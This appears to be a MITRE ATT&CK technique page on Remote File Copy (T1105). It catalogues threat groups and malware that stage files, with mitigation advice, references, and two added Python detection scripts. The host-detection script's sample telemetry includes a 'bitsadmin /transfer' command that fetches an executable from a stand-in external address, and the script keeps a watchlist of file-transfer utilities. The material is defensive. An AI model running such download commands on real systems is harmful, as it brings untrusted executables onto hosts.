Remote File Copy

Type: Technique
ID: T1105
Tactic: Command and Control, Lateral Movement
Platform: Linux, macOS, Windows
Permissions Required: User
Data Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring
Requires Network: Yes

Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network, or through alternate protocols with another tool such as FTP. On macOS and Linux, files can also be copied with native tools like scp, rsync, and sftp.

Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution, using inherent file sharing protocols such as SMB to connected network shares, or authenticated connections via Windows Admin Shares or Remote Desktop Protocol.

Examples

  • APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.[1][2]
  • APT3 has a tool that can copy files to remote machines.[3]
  • APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.[4]
  • APT34 can download remote files onto victims.[5]
  • APT37 has downloaded second-stage malware from compromised websites.[6]
  • BRONZE BUTLER has used various tools to download files, including DGet (a tool similar to wget).[7]
  • Dragonfly downloaded tools from a remote server after they were inside the victim network.[8]
  • The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.[9]
  • FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.[10]
  • FIN7 uses a PowerShell script to launch shellcode that retrieves an additional payload.[11]
  • FIN8 has used remote code execution to download subsequent payloads.[12]
  • Tools used by Gamaredon Group are capable of downloading and executing additional payloads.[13]
  • Several Lazarus Group malware families are capable of downloading and executing binaries from the group's C2 servers.[14][15]
  • Leviathan has downloaded additional scripts and files from adversary-controlled servers.[16] Leviathan has also used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.[17]
  • Magic Hound has downloaded additional code and files from servers onto victims.[18]
  • PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.[19]
  • A Patchwork payload downloads additional malware from the C2 server.[20]
  • After re-establishing access to a victim network, Threat Group-3390 actors download tools including gsecdump and WCE that are staged temporarily on websites that were previously compromised but never used.[21]
  • menuPass has installed updates and new malware on victims.[22]
  • Agent.btz attempts to download an encrypted binary from a specified domain.[23]
  • BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.[24][25]
  • BITSAdmin can be used to create BITS Jobs to upload and/or download files.[26]
  • Briba downloads files onto infected hosts.[27]
  • CHOPSTICK is capable of performing remote file transmission.[28]
  • CORESHELL downloads another dropper from its C2 server.[29]
  • CallMe has the capability to download a file to the victim from the C2 server.[30]
  • ChChes is capable of downloading files, including additional modules.[31][32][33]
  • China Chopper can upload and download files.[17]
  • CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.[34]
  • Crimson contains a command to retrieve files from its C2 server.[35]
  • Darkmoon creates a backdoor through which remote attackers can upload files.[36]
  • Daserf can download remote files.[37][7]
  • Dipsind can download remote files.[38]
  • After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.[39]
  • DustySky searches for network drives and removable media and duplicates itself onto them.[40]
  • Emissary has the capability to download files from the C2 server.[41]
  • Felismus can download files from remote servers.[42]
  • Gazer can execute a task to download a file.[43][44]
  • H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.[45]
  • An APT37 malware family can download and execute a second-stage payload.[6]
  • HTTPBrowser is capable of writing a file to the compromised system from the C2 server.[21]
  • Helminth can download additional files.[46]
  • Hi-Zor has the ability to upload and download files from its C2 server.[47]
  • Hydraq creates a backdoor through which remote attackers can download files and additional malware components.[48][49]
  • JHUHUGIT can retrieve an additional payload from its C2 server.[50][51]
  • JPIN can download files and upgrade itself.[38]
  • Another APT37 malware family can upload and download files, including second-stage malware.[6]
  • Kasidet has the ability to download and execute additional files.[52]
  • LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.[53]
  • Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.[54]

Mitigation

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware, or unusual data transfer over known tools and protocols like FTP, can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, so they will likely differ across malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[55]

Detection

Monitor for file creation and for files transferred within a network over SMB. Unusual processes with external network connections that create files on the system may be suspicious. Use of utilities such as FTP on hosts where it does not normally occur is also suspicious.
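The host-side correlation described above, as an added example that is not part of the ATT&CK page or of any vendor product: a small Python analyzer over constructed Sysmon-style events (network-connect, file-create, process-create) that flags a process writing an executable after contacting an external host, a user-mode process speaking SMB, transfer utilities such as ftp and bitsadmin, and network use by images outside an assumed baseline. The internal address ranges, the baseline image set and the event records are assumptions constructed for the example.

```python
"""Host-side detection for Remote File Copy (added example, not ATT&CK code).

Correlates process network connections with file creation so that a
process which talks to an external host and then drops an executable is
flagged, and flags transfer utilities and network use by unbaselined
images.  Event records are constructed, loosely shaped like Sysmon
network-connect / file-create / process-create telemetry."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumed enclave: anything outside these ranges counts as external.
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# Transfer utilities the page names, plus bitsadmin from the examples list.
TRANSFER_TOOLS = {"ftp.exe", "bitsadmin.exe", "ftp", "scp", "sftp", "rsync"}
EXEC_EXT = (".exe", ".dll", ".sys", ".ps1", ".bat", ".vbs", ".scr")
# Hypothetical baseline of images seen using the network during a learning
# period on this host; "system" covers the kernel-originated SMB client.
NET_BASELINE = {"system", "svchost.exe", "chrome.exe", "outlook.exe"}


def basename(path):
    """Last path component, lower-cased, for either path separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def analyze(events):
    """Return a list of alert dicts in event-time order."""
    alerts = []
    external_peers = defaultdict(set)   # pid -> external hosts it contacted
    flagged_unbaselined = set()         # report each unbaselined pid once
    for ev in sorted(events, key=lambda e: e["ts"]):
        img, pid = basename(ev["image"]), ev["pid"]
        if ev["type"] == "net_connect":
            if is_external(ev["dst"]):
                external_peers[pid].add(ev["dst"])
            if img not in NET_BASELINE and pid not in flagged_unbaselined:
                flagged_unbaselined.add(pid)
                alerts.append({"rule": "unbaselined-network-process", "pid": pid,
                               "detail": f"{img} -> {ev['dst']}:{ev['dport']}"})
            # SMB client traffic is normally originated by the kernel (image
            # "System"); a user-mode process talking to 445 is worth a look.
            if ev["dport"] == 445 and img != "system":
                alerts.append({"rule": "usermode-smb-client", "pid": pid,
                               "detail": f"{img} -> {ev['dst']}:445"})
        elif ev["type"] == "file_create":
            if pid in external_peers and ev["path"].lower().endswith(EXEC_EXT):
                alerts.append({"rule": "external-conn-writes-executable", "pid": pid,
                               "detail": f"{img} wrote {ev['path']} after contacting "
                                         f"{', '.join(sorted(external_peers[pid]))}"})
        elif ev["type"] == "process_create":
            if img in TRANSFER_TOOLS:
                alerts.append({"rule": "transfer-utility", "pid": pid,
                               "detail": ev.get("cmdline", img)})
    return alerts


# Constructed sample telemetry (not real events).
EVENTS = [
    {"ts": 1, "type": "net_connect", "pid": 4, "image": "System",
     "dst": "10.0.0.5", "dport": 445},
    {"ts": 2, "type": "net_connect", "pid": 4012,
     "image": r"C:\Windows\System32\svchost.exe", "dst": "203.0.113.7", "dport": 443},
    {"ts": 3, "type": "file_create", "pid": 4012,
     "image": r"C:\Windows\System32\svchost.exe", "path": r"C:\Windows\Temp\wu.log"},
    {"ts": 4, "type": "net_connect", "pid": 5120,
     "image": r"C:\Users\bob\AppData\Local\Temp\helper.exe", "dst": "203.0.113.7", "dport": 443},
    {"ts": 5, "type": "file_create", "pid": 5120,
     "image": r"C:\Users\bob\AppData\Local\Temp\helper.exe",
     "path": r"C:\Users\bob\AppData\Local\Temp\stage2.exe"},
    {"ts": 6, "type": "net_connect", "pid": 5120,
     "image": r"C:\Users\bob\AppData\Local\Temp\helper.exe", "dst": "10.0.0.8", "dport": 445},
    {"ts": 7, "type": "process_create", "pid": 6001,
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job http://203.0.113.7/a.exe C:\Users\bob\a.exe"},
]

if __name__ == "__main__":
    for a in analyze(EVENTS):
        print(f"[{a['rule']}] pid={a['pid']} {a['detail']}")
```

On the sample events the kernel SMB client and svchost's external connection stay quiet, while helper.exe is reported three times (unbaselined network use, executable written after contacting 203.0.113.7, SMB to an internal host from user mode) and the bitsadmin launch once. The baseline set is the tunable part: built from a real learning window it is what turns "process with network connections creating files" into something an analyst can triage.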

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes using the network that do not normally have network communication, or that have never been seen before, are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port being used.[55]
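The network-side checks above, as an added example that is not part of the ATT&CK page: a Python pass over constructed flow records that carry byte counts and the first client payload bytes, reporting client-to-server transfers that are heavily upload-weighted and payloads that do not match the protocol expected on the destination port. The upload thresholds, the port-to-protocol expectations and the flow records are assumptions constructed for the example.

```python
"""Network-side detection for Remote File Copy (added example, not ATT&CK code).

Given flow records with byte counts and the first client payload bytes,
flag (1) flows whose upload volume dwarfs the download volume and
(2) payloads that do not look like the protocol expected on the port.
The flow records are constructed for this example, not real captures."""
from collections import defaultdict

# Minimum upload size and upload/download ratio before a flow is reported;
# both thresholds are assumptions to be tuned per environment.
MIN_UPLOAD_BYTES = 100_000
UPLOAD_RATIO = 10.0

HTTP_METHODS = (b"GET ", b"POST ", b"PUT ", b"HEAD ", b"OPTIONS ", b"DELETE ")


def looks_like_tls(payload):
    # TLS record header: content type 0x16 (handshake), version major byte 0x03.
    return payload[:1] == b"\x16" and payload[1:2] == b"\x03"


def looks_like_http(payload):
    return payload.startswith(HTTP_METHODS)


def looks_like_ssh(payload):
    # Both sides of SSH open with an identification string.
    return payload.startswith(b"SSH-")


# Expected client-side first bytes per destination port (assumed mapping).
EXPECTED_PROTOCOL = {443: looks_like_tls, 80: looks_like_http, 22: looks_like_ssh}


def analyze_flows(flows):
    """Return protocol-mismatch alerts per flow, then upload-heavy alerts
    aggregated per (src, dst, dport) across all flows."""
    alerts = []
    totals = defaultdict(lambda: [0, 0])   # (src, dst, dport) -> [out, in]
    for f in flows:
        key = (f["src"], f["dst"], f["dport"])
        totals[key][0] += f["bytes_out"]
        totals[key][1] += f["bytes_in"]
        check = EXPECTED_PROTOCOL.get(f["dport"])
        if check is not None and not check(f["payload"]):
            alerts.append({"rule": "port-protocol-mismatch", "flow": key,
                           "detail": f"first bytes {f['payload'][:16]!r}"})
    for key, (out_b, in_b) in totals.items():
        if out_b >= MIN_UPLOAD_BYTES and out_b / max(in_b, 1) >= UPLOAD_RATIO:
            alerts.append({"rule": "client-upload-heavy", "flow": key,
                           "detail": f"{out_b} bytes out vs {in_b} bytes in"})
    return alerts


# Constructed sample flows (not real traffic).
FLOWS = [
    # Large upload to an external host wrapped in what looks like TLS.
    {"src": "10.0.0.12", "dst": "203.0.113.7", "dport": 443,
     "bytes_out": 1_500_000, "bytes_in": 20_000,
     "payload": b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4"},
    # Ordinary browsing: small request, larger response.
    {"src": "10.0.0.12", "dst": "93.184.216.34", "dport": 443,
     "bytes_out": 4_000, "bytes_in": 120_000,
     "payload": b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4"},
    # Cleartext HTTP tool download on the TLS port.
    {"src": "10.0.0.15", "dst": "198.51.100.9", "dport": 443,
     "bytes_out": 2_000, "bytes_in": 900_000,
     "payload": b"GET /a.exe HTTP/1.1\r\nHost: x\r\n"},
    # Upload-weighted SSH session to an internal host (scp/sftp staging).
    {"src": "10.0.0.15", "dst": "10.0.0.5", "dport": 22,
     "bytes_out": 300_000, "bytes_in": 8_000,
     "payload": b"SSH-2.0-OpenSSH_8.9\r\n"},
]

if __name__ == "__main__":
    for a in analyze_flows(FLOWS):
        print(f"[{a['rule']}] {a['flow']} {a['detail']}")
```

The ratio check deliberately works on per-peer totals rather than single flows, because a file pushed through many short connections would otherwise stay under any per-flow threshold; the protocol check only needs the first bytes each side sends, which is what a netflow exporter with a small payload sample provides.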

References

  1. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
  2. Unit 42. (2018, February 28). Unit 42 Playbook Viewer - Sofacy. Retrieved March 15, 2018.
  3. Chen, X., Scott, M., Caselden, D. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
  4. Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
  5. Sardiwal, M., et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
  6. FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.
  7. Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
  8. US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.
  9. Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.
  10. FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.
  11. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  12. Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.
  13. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  14. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
  15. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.
  16. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
  17. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  18. Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
  19. Kaplan, D., et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.
  20. Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.
  21. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved January 25, 2016.
  22. PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
  23. Shevchenko, S. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.
  24. Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
  25. Levene, B., et al. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
  26. Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.
  27. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
  28. Alperovitch, D. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
  29. FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
  30. Falcone, R. and Miller-Osborn, J. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
  31. Miller-Osborn, J. and Grunzweig, J. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
  32. Nakamura, Y. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
  33. FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
  34. F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
  35. Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
  36. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
  37. Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.
  38. Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
  39. ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
  40. ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
  41. Falcone, R. and Miller-Osborn, J. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
  42. Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
  43. ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
  44. Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.
  45. Reynolds, J. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.
  46. Falcone, R. and Lee, B. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
  47. Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
  48. Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.
  49. Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.
  50. ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
  51. Lee, B., et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.
  52. Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.
  53. FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
  54. Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.
  55. Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.